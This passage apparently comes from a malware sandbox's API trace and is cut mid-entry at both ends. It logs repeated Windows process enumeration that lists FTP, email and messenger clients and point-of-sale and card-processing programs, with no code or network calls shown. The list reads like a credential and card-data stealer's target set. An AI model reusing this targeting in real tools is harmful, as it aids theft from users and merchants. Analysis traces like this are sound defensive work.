pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0249.833] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0249.834] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0249.836] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0249.837] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0249.838] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0249.843] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0249.844] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xea0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0249.846] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0249.847] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0249.850] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0249.852] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0249.854] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0249.881] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xee4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0249.883] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xef8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0249.885] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0249.900] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0249.904] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0249.906] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0249.908] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0249.910] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0249.912] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0249.914] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0249.916] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0249.917] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0249.922] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0249.923] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0249.925] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0249.927] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0249.928] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0249.930] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0249.932] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0250.050] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0250.051] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0250.053] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0250.055] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0250.057] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x594, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0250.058] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0250.083] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0250.085] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0250.087] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x100c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0250.089] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1018, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0250.095] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1028, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0250.097] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="likely-final-out.exe")) returned 1 [0250.098] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="local reality bank.exe")) returned 1 [0250.100] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="kitchen-box-instead.exe")) returned 1 [0250.102] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1058, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x9dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0250.103] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0250.105] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x127c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0250.111] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0250.112] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0250.114] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0250.115] CloseHandle (hObject=0x758) returned 1 [0250.115] Sleep (dwMilliseconds=0x64) [0250.269] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0250.303] Process32First (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0250.305] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x79, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0250.307] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0250.309] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0250.313] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0250.315] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0250.316] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0250.317] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0250.319] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0250.320] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0250.322] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0250.324] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0250.325] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0250.330] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0250.332] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0250.334] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0250.335] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0250.337] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0250.339] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0250.423] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0250.425] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0250.427] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0250.429] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0250.431] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0250.439] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0250.441] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0250.443] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0250.445] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0250.447] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0250.453] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x838, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0250.455] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0250.457] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x7b4, 